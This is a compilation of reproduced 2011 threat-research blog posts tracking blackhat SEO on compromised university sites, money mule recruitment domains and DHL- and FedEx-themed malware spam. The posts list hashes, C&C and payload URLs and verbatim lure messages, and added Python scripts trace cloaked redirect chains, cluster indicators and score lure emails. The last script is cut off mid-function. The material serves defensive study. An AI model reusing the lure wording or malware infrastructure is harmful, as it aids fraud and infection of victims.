04. [11]Spamvertised Xerox document themed malware campaign spreading 

05. [12]New report details the prices within the cybercrime 
market 

06. [13]Report: AV users still get infected with malware 

07. [14]Microsoft disables AutoRun on Windows XP/Vista to 
prevent malware infections 



08. [15]Google intros advanced sign-in feature 

09. [16]Malware Watch: UPS/FDIC; Mobile app; Infected 
ambulance dispatch 

10. [17]Report: Patched vulnerabilities remain prime 
exploitation vector 

11. [18]Bogus Android apps lead to malware 

12. [19]ZeuS crimeware variant targets Symbian and 
BlackBerry users 

13. [20]Researchers spot new Mac OS X malware 

This post has been reproduced from [21]Dancho 
Danchev's blog. Follow him [22]on Twitter. 

1. https://lh5.googleusercontent.com/-n-oZ7kPS_XE/TWup2Vp4Hil/AAAAAAAAElk/cvb-TliEwfM/s1600/ZDNet_Zero_Day_February_2011.png 

2. http://www.zdnet.com/topics/dancho-i-danchev?o=1&mode=rss&tag=mantle_skin;content 

3. http://feeds.feedburner.com/zdnet/security 

4. http://twitter.com/danchodanchev 

5. http://www.zdnet.com/blog/security/500000-stolen-email-passwords-discovered-in-waledacs-cache/8045 

6. http://www.zdnet.com/blog/security/report-av-users-still-get-infected-with-malware/8108 

7. http://www.zdnet.com/blog/security/report-patched-vulnerabilities-remain-prime-exploitation-vector/8162 

8. http://www.zdnet.com/blog/security/researcher-demos-sms-based-smartphone-botnet/8031 

9. http://www.zdnet.com/blog/security/500000-stolen-email-passwords-discovered-in-waledacs-cache/8045 

10. http://www.zdnet.com/blog/security/study-us-tops-zeus-hosting-infrastructure-chart/8064 

11. http://www.zdnet.com/blog/security/spamvertised-xerox-document-themed-malware-campaign-spreading/8075 

12. http://www.zdnet.com/blog/security/new-report-details-the-prices-within-the-cybercrime-market/8078 

13. http://www.zdnet.com/blog/security/report-av-users-still-get-infected-with-malware/8108 

14. http://www.zdnet.com/blog/security/microsoft-disables-autorun-on-windows-xpvista-to-prevent-malware-infections/8123 

15. http://www.zdnet.com/blog/security/google-intros-advanced-sign-in-feature/8137 

16. http://www.zdnet.com/blog/security/malware-watch-upsfdic-mobile-app-infected-ambulance-dispatch/8151 

17. http://www.zdnet.com/blog/security/report-patched-vulnerabilities-remain-prime-exploitation-vector/8162 

18. http://www.zdnet.com/blog/security/bogus-android-apps-lead-to-malware/8212 

19. http://www.zdnet.com/blog/security/zeus-crimeware-variant-targets-symbian-and-blackberry-users/8231 

20. http://www.zdnet.com/blog/security/researchers-spot-new-mac-os-x-malware/8241 

21. http://ddanchev.blogspot.com/ 

22. http://twitter.com/danchodanchev 
Compromised University Leads to Fraudulent Google Brand-jacked Pharmaceutical Ads (2011-03-07 14:08) 

[1] 

An exploited web application vulnerability within Cochise County Online University's CMS (moodle.cochise.az.gov/user) is currently resulting in a blackhat SEO campaign (1,890 pages) leading to fraudulent Google brand-jacked pharmaceutical pages. 

Naturally, once the compromise took place, the cybercriminals started treating the blackhat SEO content farm themed around pharmaceutical scams as part of their infrastructure, and spamvertised links to it across multiple web forums. 

[2]

The redirection chain is as follows:

- moodle.cochise.az.gov/user - random pharmaceutical content
- goodmedk.com
- gooqpilly.com
- 50.22.28.50

goodmedk.com/whftltyixallwke6hoqstgzsiq.html - 77.67.80.48, AS3257 - Email: jognbroownn@usa.com
goodmedk.com/kavglmapejes7bdfg6mf8d.py
goodmedk.com/hxinlaresbnzbikmnatmck.py
goodmedk.com/huvtleikspann6hoqstgzsiq.html
goodmedk.com/txajlatev0egij9pi-g.pi
goodmedk.com/tldhlaoet8cegh7ng9e.html

[3]

Redirectors used:

gooqpilly.com - 77.67.80.42, AS3257 - Email: jognbroownn@usa.com
50.22.28.50/c.php - 50.22.28.50-static.reverse.softlayer.com

[4]

Redirects to the following currently active fraudulent online pharmacies:

pillshealthmedsplus.net - 89.114.9.82 - Email: acquit@bz3.ru
allrxtabs.com - 91.212.135.69 - Email: rxrevenue@gmail.com
canadianselect.net - 89.149.196.197 - Email: canadianselect.net@protecteddomainservices.com
worldselectshop.com - 95.211.1.82 - Email: worldselectshop.com@protecteddomainservices.com
generic-pills-online.eu - 95.163.15.207
menhealth-pharmacy.co.uk - 109.237.213.194
4rx.com - 174.127.67.233 - Email: webmaster@4rx.com

The hijacking of a trusted brand such as Google shouldn't be surprising, as it's an inseparable part of the social-engineering-driven abuse of the trust chain. From Google's name to the visual impersonation of Google Search, this campaign demonstrates exactly that.
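The chain above is what a visitor arriving from a search result sees; a direct visit to the compromised page usually gets a harmless doorway page, because blackhat SEO redirectors cloak on the Referer header. The following added example (not code from the original post) walks such a chain offline against a constructed stand-in for the network: the hosts and paths are the ones listed above, while the cloaking rule, the status codes, the meta-refresh hop and the scheme-relative Location header are assumptions made to exercise the cases a chain walker has to handle (spoofed search referer, relative redirects, loops and a hop limit).

```python
import re
from urllib.parse import urljoin, urlsplit

GOOGLE_REFERER = "https://www.google.com/search?q=cheap+pills"
USER_AGENT = "Mozilla/5.0"
META_REFRESH = re.compile(r'http-equiv=["\']?refresh["\']?[^>]*url=([^"\'>\s]+)', re.I)

# Constructed stand-in for the network. Hosts and paths follow the chain in the
# post; the cloaking rule, status codes and the meta-refresh hop are assumptions
# made for illustration, not observed responses.
FAKE_WEB = {
    "http://moodle.cochise.az.gov/user": {
        # the compromised page only redirects visitors arriving from a search engine
        "referred": (302, {"Location": "http://goodmedk.com/whftltyixallwke6hoqstgzsiq.html"}, ""),
        "cloaked": (200, {}, "<html>keyword-stuffed doorway text</html>"),
    },
    "http://goodmedk.com/whftltyixallwke6hoqstgzsiq.html": {
        "any": (200, {}, '<meta http-equiv="refresh" content="0;url=http://gooqpilly.com/">'),
    },
    "http://gooqpilly.com/": {
        "any": (302, {"Location": "//50.22.28.50/c.php"}, ""),  # scheme-relative Location
    },
    "http://50.22.28.50/c.php": {
        "any": (302, {"Location": "http://pillshealthmedsplus.net/"}, ""),
    },
    "http://pillshealthmedsplus.net/": {
        "any": (200, {}, "<html>Canadian Pharmacy</html>"),
    },
}


def fake_fetch(url, headers):
    """Return (status, headers, body) the way an HTTP client would, choosing
    the cloaked variant unless the Referer is a Google search page."""
    variants = FAKE_WEB.get(url)
    if variants is None:
        return 404, {}, ""
    if "any" in variants:
        return variants["any"]
    referer_host = urlsplit(headers.get("Referer", "")).netloc
    return variants["referred" if referer_host.endswith("google.com") else "cloaked"]


def follow_chain(start, fetch=fake_fetch, referer=GOOGLE_REFERER, max_hops=10):
    """Walk HTTP 3xx and meta-refresh redirects from `start`.
    Returns (urls_visited, outcome) where outcome is 'landed' (final 200),
    'dead-end' (error status), 'loop' or 'hop-limit'."""
    headers = {"Referer": referer, "User-Agent": USER_AGENT}
    chain, seen, url = [], set(), start
    while True:
        if url in seen:
            return chain, "loop"
        if len(chain) >= max_hops:
            return chain, "hop-limit"
        seen.add(url)
        chain.append(url)
        status, resp_headers, body = fetch(url, headers)
        next_url = None
        if 300 <= status < 400 and "Location" in resp_headers:
            next_url = urljoin(url, resp_headers["Location"])  # resolves relative and // forms
        elif status == 200:
            m = META_REFRESH.search(body)
            if m:
                next_url = urljoin(url, m.group(1))
        if next_url is None:
            return chain, "landed" if status == 200 else "dead-end"
        headers = {"Referer": url, "User-Agent": USER_AGENT}  # each hop refers the previous page
        url = next_url


if __name__ == "__main__":
    for ref in (GOOGLE_REFERER, ""):
        urls, outcome = follow_chain("http://moodle.cochise.az.gov/user", referer=ref)
        print(f"referer={ref or '(none)'}: {outcome} after {len(urls)} hop(s)")
        for u in urls:
            print("  ->", u)
```

Run as a script it prints the full five-hop chain for the search-engine visit and a single cloaked page for the direct visit, which is why a sandbox that fetches the compromised URL without a search referer will report nothing suspicious. To use it against a live chain, swap `fake_fetch` for a function that performs the request without following redirects itself (for example `requests.get(url, headers=headers, allow_redirects=False, timeout=10)`), so that every hop is recorded.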

This post has been reproduced from [5]Dancho Danchev's blog. Follow him [6]on Twitter.

1. https://lh5.googleusercontent.com/-FaZm5Nia4mo/TXTAssw6EUI/AAAAAAAAElo/8G-6ee31FHI/s1600/Google Health pharmaceutical.PNG
2. https://lh4.googleusercontent.com/-YP4-klDQSwl/TXTGUU0vlKI/AAAAAAAAEls/fvkF905waTM/s1600/Fake Google Health pharmaceutical spamvertised links.PNG
3. https://lh5.googleusercontent.com/-4DvwYszzZvA/TXTHklXlfQI/AAAAAAAAElw/UA2AKPC8CM8/s1600/Fake Google Health pharmaceutical.PNG
4. https://lh5.googleusercontent.com/-BPztch9g4Tc/TXTIIo2eCII/AAAAAAAAElQ/kX4URWeZDmk/s1600/fraudulentpharmaceutical.PNG
5. http://ddanchev.blogspot.com/
6. http://twitter.com/danchodanchev
Keeping Money Mule Recruiters on a Short Leash - Part Six (2011-03-10 14:45)

[1]

Following my previous post on "[2]Keeping Money Mule Recruiters on a Short Leash - Part Five", in this post we're once again going to expose a portfolio of money mule recruitment domains, their related ASs and name servers of notice, including some additional SpyEye activity within one of the ASs.

What's particularly interesting is the ongoing use of similar templates, including fake "certified by" documents aiming to boost the visitor's confidence in the mule recruitment company. Sample "certified by" documents include:

[3]

[4]

[5]

[6]

[7]

Money mule recruitment web sites:

ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru - [8]seen here
ANTIQUEE-CORP.INFO - Email: admin@antiquee-corp.info
ARAMATEGROUP-INT.INFO - Email: admin@aramategroup-int.info
art-marketllc.cc - Email: hear@ppmail.ru
ARTSOLVE-LTD.AT - Email: admin@artsolve-ltd.at
ARTSOLVELTD.CC - Email: admin@artsolveltd.cc
artsolveltd.cc - Email: admin@artsolveltd.cc
ARTSOLVELTDCO.AT - Email: admin@artsolveltd.cc
artsolveltdco.at - Email: admin@artsolveltd.cc
ASTECH-GROUPDE.CC - Email: admin@i-compass-group.cc
atlant-groupinc.cc - Email: bombay@yourisp.ru - [9]seen here
Atlant-usainc.net - Email: admin@atlant-usainc.net
BREDGARCORP-ANT.BE
CREATENCE-GROUPLLC.AT - Email: admin@creatence-groupllc.at
CREATENCE-GROUPLLC.CC - Email: hunt@bz3.ru
CREATENCEGROUP-LLC.CO - Email: px@bz3.ru
DEVAS-LLC.CO - Email: gate@ppmail.ru
DRYSDALE-ANTCORP.AT - Email: admin@drysdale-antcorp.at
DRYSDALE-ANTCORP.BIZ - Email: admin@drysdale-antcorp.biz
DRYSDALE-GROUP-INC.CC - Email: atomic@bz3.ru
DUNCROFT-ANTTEAM.ORG - Email: admin@drysdale-antcorp.biz
FINTEC-UKLTD.WS
fintec-ukltd.ws
fourthgroup-ltd.cc - Email: rots@cheapbox.ru
generalabbrialgroup-ltd.net - Email: admin@generalabbrialgroup-ltd.net
generation-groupltd.cc - Email: jz@ppmail.ru
I-COMPASS-GROUP.AT - Email: admin@i-compass-group.at
katemdutkins.co.cc
LILAC-GROUPLLC.CC - Email: lane@free-id.ru
LILACGROUP-LLC.CO - Email: baggy@bz3.ru
MIMOSA-INCGROUP.INFO - Email: admin@mimosa-incgroup.info
moneyvisual-ukllc.com - Email: admin@moneyvisual-ukllc.com
nimrodltd-uk.net - Email: admin@nimrodltd-uk.net
OLIVER-ANTCORP.NET - Email: admin@oliver-antcorp.net
qead-groupllc.net - Email: admin@qead-groupllc.net
renaissancellc.be
renaissance-llc.cc - Email: admin@renaissance-llc.cc
ROYALTHELMAS-GROUP-LLC.CC - Email: zap@ca4.ru
ROYALTHELMAS-TEAMANT.ASIA - Email: admin@royalthelmas-teamant.asia
SCHWARTZBROTHERSANT-CORP.COM - Email: admin@schwartzbrothersant-corp.com
STRATEGICGROUP-LLC.CO - Email: flute@free-id.ru
THRONE-GROUPLLC.CC - Email: lane@free-id.ru
THRONEGROUP-LLC.CO - Email: floyd@ca4.ru
THRONE-UK.AT - Email: admin@throne-uk.at
TINASSANSERVICEANT-ANTTEAM.NET - Email: admin@tinassanserviceant-antteam.net
TINASSANSERVICE-GROUPLLC.CC - Email: six@yourisp.ru
westerntrust.co.uk
westview-art.net - Email: admin@westview-art.net

[10]

Domains responding to:

78.46.105.205 - AS24940, HETZNER-AS Hetzner Online AG RZ
98.141.220.116 - AS29713, INTERPLEXINC Interplex LLC.
98.141.220.117 - AS29713, INTERPLEXINC Interplex LLC.
114.207.244.143 - AS9318, HANARO-AS Hanaro Telecom Inc.
114.207.244.144 - AS9318, HANARO-AS Hanaro Telecom Inc.
114.207.244.145 - AS9318, HANARO-AS Hanaro Telecom Inc.
114.207.244.146 - AS9318, HANARO-AS Hanaro Telecom Inc.
193.105.134.230 - AS42708, PORTLANE Network
193.105.134.231 - AS42708, PORTLANE Network
193.105.134.232 - AS42708, PORTLANE Network
193.105.134.233 - AS42708, PORTLANE Network
193.105.134.234 - AS42708, PORTLANE Network
195.182.57.84 - AS47311, Cerannics-AS Cerannics lip
195.182.57.91 - AS47311, Cerannics-AS Cerannics lip
204.45.118.54 - 204.45.118.48/29, INSIGHT-INVESTMENTS-LLC

More malicious activity within [11]AS24940, HETZNER-AS Hetzner Online AG RZ, courtesy of the SpyEye tracker:

188.40.198.185
188.40.87.88
www.privathosting.eu
spl.privathosting.eu
46.4.194.162
188.40.87.91
88.198.36.61

[12]

Name servers of notice:

ns1.uknamo.com - 69.10.44.188 - Email: morph@ppmail.ru
ns2.uknamo.com - 178.162.181.11
ns3.uknamo.com - 66.199.236.116
ns1.ukansnami.com - 178.162.181.11 - Email: glide@yourisp.ru
ns2.ukansnami.com - 178.162.181.11
ns3.ukansnami.com - 66.199.236.117
ns3.dnsukrect.com - 66.199.236.118 - Email: code@yourisp.ru
NS1.LIBUNITAU.CC - 178.162.152.76 - Email: ached@yourisp.ru - [13]seen here
NS2.LIBUNITAU.CC - 66.199.236.115
NS3.LIBUNITAU.CC - 178.162.181.11
NS1.AUSTDEC.CC - 178.162.152.75 - Email: bold@yourisp.ru - [14]seen here
NS2.AUSTDEC.CC - 66.199.236.114
NS3.AUSTDEC.CC - 178.162.181.11
NS1.SURPLUSUSA.CC - 209.159.156.162 - Email: skulk@ppmail.ru - [15]seen here
NS2.SURPLUSUSA.CC - 76.73.47.26
NS3.SURPLUSUSA.CC - 69.50.192.97
NS1.USABONDS.CC - Email: bart@cheapbox.ru - [16]seen here
NS2.USABONDS.CC
NS3.USABONDS.CC

The cybercriminals have also switched from using unique emails for registrations to a default admin@<money-mule-recruitment-domain> style of registration, which gives the registrant address no pivot value on its own. Monitoring of their money mule recruitment activities is ongoing.
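The pivots used above (domains sharing a throwaway registrant address, name servers sharing an IP, and the shift to default admin@<domain> registrations) are mechanical enough to script. The following is an added example, not code from the original post: it parses a handful of the lines listed above, embedded here as constructed sample input in the same `domain - IP - Email: address` layout, and groups them by shared registrant email, shared IP and shared email provider, while flagging registrations that merely use the default admin@ address of their own domain. The line grammar and field names are assumptions about this page's format.

```python
import re
from collections import defaultdict

# Constructed sample input copied from the indicator lists in this post; the
# line layout "domain - IP - Email: address - [n]seen here" is the page's own.
SAMPLE_IOCS = """
ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru - [8]seen here
ANTIQUEE-CORP.INFO - Email: admin@antiquee-corp.info
art-marketllc.cc - Email: hear@ppmail.ru
atlant-groupinc.cc - Email: bombay@yourisp.ru - [9]seen here
BREDGARCORP-ANT.BE
DRYSDALE-ANTCORP.BIZ - Email: admin@drysdale-antcorp.biz
DUNCROFT-ANTTEAM.ORG - Email: admin@drysdale-antcorp.biz
LILAC-GROUPLLC.CC - Email: lane@free-id.ru
THRONE-GROUPLLC.CC - Email: lane@free-id.ru
ns1.uknamo.com - 69.10.44.188 - Email: morph@ppmail.ru
ns2.uknamo.com - 178.162.181.11
ns1.ukansnami.com - 178.162.181.11 - Email: glide@yourisp.ru
"""

# One indicator line: a host name ending in an alphabetic TLD, optionally
# "- IPv4", optionally "- Email: address"; trailing "[n]seen here" is ignored.
IOC_LINE = re.compile(
    r"^(?P<domain>[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,})"
    r"(?:\s*-\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3}))?"
    r"(?:\s*-\s*Email:?\s*(?P<email>[^\s@]+@[^\s@]+))?"
)


def parse_iocs(text):
    """Turn the page's indicator lines into records; lines that do not start
    with a host name (captions, reference markers, bare IPs) are skipped."""
    records = []
    for raw in text.splitlines():
        m = IOC_LINE.match(raw.strip())
        if not m:
            continue
        email = m.group("email").lower() if m.group("email") else None
        records.append({
            "domain": m.group("domain").lower(),
            "ip": m.group("ip"),
            "email": email,
            "email_host": email.split("@", 1)[1] if email else None,
        })
    return records


def is_default_admin(rec):
    """True when the registrant address is just admin@<the domain itself>,
    the pattern the post says the recruiters switched to. Such an address
    links the domain to nothing else, so it is not a pivot by itself."""
    if not rec["email"]:
        return False
    local, host = rec["email"].split("@", 1)
    return local == "admin" and host == rec["domain"]


def cluster(records, field):
    """Group domains by a shared value of `field`, keeping only values seen
    on two or more domains (a single occurrence is not a link)."""
    groups = defaultdict(set)
    for rec in records:
        if rec[field]:
            groups[rec[field]].add(rec["domain"])
    return {value: sorted(domains)
            for value, domains in groups.items() if len(domains) > 1}


def summarize(records):
    # Email clusters run over every record: a default admin@ address reused
    # on a *different* domain (DUNCROFT above) is exactly the kind of slip
    # that ties two otherwise unrelated registrations together.
    pivots = [r for r in records if r["email"] and not is_default_admin(r)]
    return {
        "records": len(records),
        "default_admin": sum(is_default_admin(r) for r in records),
        "shared_email": cluster(records, "email"),
        "shared_ip": cluster(records, "ip"),
        "shared_provider": cluster(pivots, "email_host"),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(parse_iocs(SAMPLE_IOCS)), indent=2))
```

On the sample, the script links ACOON-GROUPLLC.CC to atlant-groupinc.cc through bombay@yourisp.ru, DRYSDALE-ANTCORP.BIZ to DUNCROFT-ANTTEAM.ORG through a reused admin@ address, and ns2.uknamo.com to ns1.ukansnami.com through 178.162.181.11; the provider pivot (yourisp.ru, ppmail.ru, free-id.ru) is the weakest of the three and is only worth acting on together with the others.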

Related posts:

[17] Keeping Money Mule Recruiters on a Short Leash - Part Five
[18] The DNS Infrastructure of the Money Mule Recruitment Ecosystem
[19] Keeping Money Mule Recruiters on a Short Leash - Part Four
[20] Money Mule Recruitment Campaign Serving Client-Side Exploits
[21] Keeping Money Mule Recruiters on a Short Leash - Part Three
[22] Money Mule Recruiters on Yahoo!'s Web Hosting
[23] Dissecting an Ongoing Money Mule Recruitment Campaign
[24] Keeping Money Mule Recruiters on a Short Leash - Part Two
[25] Keeping Reshipping Mule Recruiters on a Short Leash
[26] Keeping Money Mule Recruiters on a Short Leash
[27] Standardizing the Money Mule Recruitment Process
[28] Inside a Money Laundering Group's Spamming Operations
[29] Money Mule Recruiters use ASProx's Fast Fluxing Services
[30] Money Mules Syndicate Actively Recruiting Since 2002

This post has been reproduced from [31]Dancho Danchev's blog.

1. https://lh6.googleusercontent.com/-xBh63uCpBLc/TXeafmi8zfl/AAAAAAAAE14/9TzxHbToRxs/s1600/money_mule_recruitment March 2010 2.png
2. http://ddanchev.blogspot.com/2011/01/keeping-money-mule-recruiters-on-short.html
3. https://lh6.googleusercontent.com/-vtOvehfM5YY/TXeeXOdl75l/AAAAAAAAE2E/RLzXhakaa3U/s1600/Stein01s.jpg
4. https://lh3.googleusercontent.com/-Piw2evlP5M/TXeealAFval/AAAAAAAAE2l/x8uWpLaAL9M/s1600/Stein02s.jpg
5. https://lh4.googleusercontent.com/-ZK7CaYS8r8/TXeedmFvOUI/AAAAAAAAE2M/gltlLo6eOWU/s1600/Stein03s.jpg
6. https://lh4.googleusercontent.com/-s6ava3Lo2pQ/TXeegnoOBvl/AAAAAAAAE20/liAdYPFIx-U/s1600/Stein04s.jpg
7. https://lh6.googleusercontent.com/-9FGZhnmN5fl/TXeekBggvbl/AAAAAAAAE2U/K8KnFPle4k/s1600/Stein05s.jpg
8. http://ddanchev.blogspot.com/2011/01/keeping-money-mule-recruiters-on-short.html
9. http://ddanchev.blogspot.com/2011/01/keeping-money-mule-recruiters-on-short.html
10. https://lh6.googleusercontent.com/-moHbHvr78Hc/TXecvhHkp6l/AAAAAAAAE18/dk563IAzcva/s1600/money_mule_recr
11. https://spyeyetracker.abuse.ch/monitor.php?as=24940
12. https://lh4.googleusercontent.com/-flfMooGls/TXedtNxlHtl/AAAAAAAAE2A/d-zWBtuOXoY/s1600/money_mule_recruitment March 2010 B.png
13. http://ddanchev.blogspot.com/2011/01/keeping-money-mule-recruiters-on-short.html
14. http://ddanchev.blogspot.com/2011/01/keeping-money-mule-recruiters-on-short.html
15. http://ddanchev.blogspot.com/2011/01/keeping-money-mule-recruiters-on-short.html
16. http://ddanchev.blogspot.com/2011/01/keeping-money-mule-recruiters-on-short.html
17. http://ddanchev.blogspot.com/2011/01/keeping-money-mule-recruiters-on-short.html
18. http://ddanchev.blogspot.com/2010/04/dns-infrastructure-of-money-mule.html
19. http://ddanchev.blogspot.com/2010/04/keeping-money-mule-recruiters-on-short.html
20. http://ddanchev.blogspot.com/2010/03/money-mule-recruitment-campaign-serving.html
21. http://ddanchev.blogspot.com/2010/03/keeping-money-mule-recruiters-on-short.html
22. http://ddanchev.blogspot.com/2010/03/money-mule-recruiters-on-yahoos-web.html
23. http://ddanchev.blogspot.com/2010/02/dissecting-ongoing-money-mule.html
24. http://ddanchev.blogspot.com/2010/02/keeping-money-mule-recruiters-on-short.html
25. http://ddanchev.blogspot.com/2009/12/keeping-reshipping-mule-recruiters-on.html
26. http://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html
27. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html
28. http://ddanchev.blogspot.com/2009/05/inside-money-laundering-groups-spamming.html
29. http://ddanchev.blogspot.com/2008/07/money-mule-recruiters-use-asproxs-fast.html
30. http://ddanchev.blogspot.com/2008/10/money-mules-syndicate-actively.html
31. http://ddanchev.blogspot.com/
Spamvertised DHL Notification Malware Campaign (2011-03-10 15:29)

[1]

A currently spamvertised malware campaign is brand-jacking DHL for malware-serving purposes.

Sample filename: document.zip => DHL_notification.exe

Sample message: Dear customer. The parcel was send your home address. And it will arrice within 7 bussness day. More information and the tracking number are attached in document below. Thank you. 2011 DHL International GmbH. All rights reserverd - notice the typo.

DHL_notification.exe - [2]Trojan-Spy.Win32.SpyEyes - Result: 27/43 (62.8 %)
MD5: bda72e57d263241d52b1fe2ef014cba9
SHA1: fa9dc14b100f1bf5124cd23c322c109b38a70675
SHA256: 199f2357c24e71d955a4e6c2d07645aa04d9474e0c8c914a1edd69a02e3f8a70

Upon execution phones back to:

adobe.com/geo/productid.php
elsoplongt.com/rk',jopbh/qwq - Email: redaccion@elsoplongt.com
accuratefiles.com/rk',jopbh/qwq
lulango.com/rk',jopbh/qwq - Email: lulango@gmail.com
erherg34gsafwe.com/xgate.php - AS49469, Email: admin@erherg34gsafwe.com
- erherg34gsafwe.com/ftp/base.bin
- erherg34gsafwe.com/ftp/ftpplug2.dll
- erherg34gsafwe.com/ftp/base.bin

Domains responding to:

192.150.16.117
72.41.115.170
74.117.180.216
87.106.193.21
94.63.244.56

This post has been reproduced from [3]Dancho Danchev's blog.

2. http://www.virustotal.com/file-scan/report.html?id=199f2357c24e71d955a4e6c2d07645aa04d9474e0c8c914a1edd69a02e3f8a70-1299762101
3. http://ddanchev.blogspot.com/
Compromised University Leads to Fraudulent Pharmaceutical Ads (2011-03-10 16:53)

[1]

Continuing the [2]Compromised University Leads to Fraudulent Google Brand-jacked Pharmaceutical Ads series, yet another university has been compromised by pharmaceutical scammers, [3]part of an affiliate network.

In this very latest example of the tactic, which seeks to abuse the high PageRank of the web site in question, the web site of the Department of Mathematics at Rutgers University (math.rutgers.edu/mdnews/) appears to have been compromised by pharmaceutical scammers.

Included URLs:

math.rutgers.edu/mdnews/levitraline.html
math.rutgers.edu/mdnews/levitrastory.html
math.rutgers.edu/mdnews/cialis-pills.html
math.rutgers.edu/mdnews/levitradosage.html
math.rutgers.edu/mdnews/viagra-buy-online.html

[4]

Redirects to:

worldselectshop.com/?id=abamos - 95.211.1.82 - Email: worldselectshop.com@protecteddomainservices.com

The same affiliate ID is also active at:

usadrugstorenow.com/products/diflucan.htm?id=abamos - 212.117.185.19 - Email: usadrugstorenow.com@protecteddomainservices.com

This post has been reproduced from [5]Dancho Danchev's blog.
More Spamvertised DHL Notifications Spread Malware (2011-03-11 15:31)

[1]

Yesterday's campaign is still ongoing, with new MD5s in the wild. Here are the details.

Sample subjects: DHL notification #random number

Sample message: Dear customer! The parcel was send your home address. And it will arrice within 7 bussness day. More information and the tracking number are attached in document below. Thank you. 2011 DHL International GmbH. All rights reserverd.

Sample filenames: DHL_tracking.zip; doc.zip

doc.exe - [2]Trojan-Spy.SpyEy!IK - Result: 18/43 (41.9 %)
MD5: 83db662187dd7cd58fc4a368ea27775d
SHA1: 4edb2d95c0570a36f6cb992e55111cdd7c3eda69
SHA256: 99f1e003bbf1025b0bbe257ece65d1704852fd1ba48e6cc79bd39cde6e6d14c3

DHL_tracking.exe - [3]Win-Trojan/Spyeyes.45568 - Result: 29/43 (67.4 %)
MD5: 81fc09b014617bce59f678374b486512
SHA1: 3d92a768f58b2900b98c9f97ce2753d27a4749ae
SHA256: 24b23bf7ebd03bf5feb0c637ea1e64661e27c78c66684dd49f074af2b2505bb7

Upon execution phones back to:

adobe.com/geo/productid.php
elsoplongt.com/rk',jopbh/qwq - Email: redaccion@elsoplongt.com
accuratefiles.com/rk',jopbh/qwq
lulango.com/rk',jopbh/qwq - Email: lulango@gmail.com
erherg34gsafwe.com/xgate.php - AS49469, Email: admin@erherg34gsafwe.com
- erherg34gsafwe.com/ftp/base.bin
- erherg34gsafwe.com/ftp/ftpplug2.dll
- erherg34gsafwe.com/ftp/base.bin

Domains responding to:

192.150.16.117
72.41.115.170
74.117.180.216
87.106.193.21
94.63.244.56

Additional malicious activity within AS49469 (SA-NOVA-TELECOM-GRUP-SRL Sa Nova Telecom Grup SRL), courtesy of the [4]ZeusTracker and the [5]SpyEye Tracker:

bigupdate.ru - Email: admin@hotupdaters.ru
bigupdatings.ru - Email: admin@bigupdatings.ru
bigupdater.ru - Email: admin@bigupdater.ru
bigupdates.ru - Email: admin@istuplenie.ru
bigupdating.ru - Email: admin@bigupdating.ru
bigupdaters.ru - Email: admin@bigupdaters.ru
94.63.244.30
metamphcrystal.com - Email: admin@metamphcrystal.com

Related malware-serving domains within AS49469, SA-NOVA-TELECOM-GRUP-SRL Sa Nova Telecom Grup SRL:

xppclapgirl.com - 89.114.9.33
natnatraoi.com - 12.211.117.127 - Email: barbarasorber@yahoo.com
d34ghqarfrgad.com - 94.63.244.56 - Email: admin@d34ghqarfrgad.com
g3u4g.net - 89.114.9.33 - Email: G3U4G.NET@domainservice.com
suhi4hr.net - 89.114.9.60 - Email: SUHI4HR.NET@domainservice.com
mialedot.ru - 94.63.244.44 - Email: abuse@mialedot.ru
blackmemoso.com - Email: grasp@yourisp.ru

This post has been reproduced from [6]Dancho Danchev's blog.
Spamvertised FedEx Notifications Spread Malware (2011-03-16 18:14)

[1]

A currently ongoing spamvertised campaign is brand-jacking FedEx for malware-serving purposes.

Sample attachments: FedEx letter.zip; FedEx letter.exe

Sample subject: FedEx notification #random number

Sample message: Dear customer. The parcel was sent your home address. And it will arrive within 7 business day. More information and the tracking number are attached in document below. Thank you. © FedEx 1995-2011

Detection rate: FedEx letter.exe - [2]Trojan.FakeAV - Result: 24/43 (55.8 %)
MD5: 90bef5dff5809682249813fd63b67da4
SHA1: 2418c01a30a19a2d76b693474a852092e3de4a32
SHA256: a38848786528d235b51fed3adf20050f5c1906d066e0282311b8bce37d8163a0

Phones back to AS30890 (EVOLVA Evolva Telecom s.r.l.):

94.63.244.56/lol2.exe
94.63.244.56/pod.exe

with 94.63.244.56/allftp.txt and 94.63.244.56/ftp/db_grab.txt hosting the sniffed FTP credentials.

Responding to 94.63.244.56 are d34ghqarfrgad.com and erherg34gsafwe.com, phone-back URLs which we've seen in last week's spamvertised DHL Notifications campaigns; the reuse of the IP is best described as a desperate attempt to maintain a C&C infrastructure:

• [3]Spamvertised DHL Notification Malware Campaign
• [4]More Spamvertised DHL Notifications Spread Malware

This post has been reproduced from [5]Dancho Danchev's blog.
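The DHL and FedEx lures above, and the UPS and USPS ones further down, reuse one template: a courier "notification" subject, the same broken sentence about a parcel sent to the home address, and a zip or rar wrapping an .exe, all sent from a domain the named courier does not own. The following added example, not code from any of the posts, scores a message on those shared traits. The two sample messages are constructed: the first reproduces the DHL text quoted above with an assumed sender address, the second is a benign notice that shares the brand but none of the signals. The brand-to-domain table and the score threshold are assumptions for illustration.

```python
import re

# Phrases shared by the courier lures quoted in this series. The broken
# grammar is part of the template, so the patterns accept the misspellings
# seen in the samples rather than the corrected English.
BODY_PATTERNS = [
    re.compile(r"parcel was sen[dt] (?:to )?your home address", re.I),
    re.compile(r"tracking number (?:is|are) attached", re.I),
    re.compile(r"print (?:the )?mailing label", re.I),
]
SUBJECT_PATTERN = re.compile(
    r"^(?:DHL|FedEx|United Parcel Service|UPS|Post Express)\b.*\b(?:notification|information)\b",
    re.I,
)
# Assumed legitimate sender domains per impersonated brand (illustrative only).
BRAND_DOMAINS = {
    "dhl": "dhl.com",
    "fedex": "fedex.com",
    "ups": "ups.com",
    "united parcel service": "ups.com",
    "post express": "usps.com",
}
EXECUTABLE = re.compile(r"\.(?:exe|scr|com|pif)$", re.I)
ARCHIVE = re.compile(r"\.(?:zip|rar)$", re.I)


def score_message(msg):
    """msg: dict with 'from' (bare address), 'subject', 'body' and
    'attachments' (list of (filename, [names inside the archive])).
    Returns (score, reasons); each independent signal adds one point."""
    reasons = []
    if SUBJECT_PATTERN.search(msg["subject"]):
        reasons.append("courier-notification subject")
    hits = sum(1 for p in BODY_PATTERNS if p.search(msg["body"]))
    if hits:
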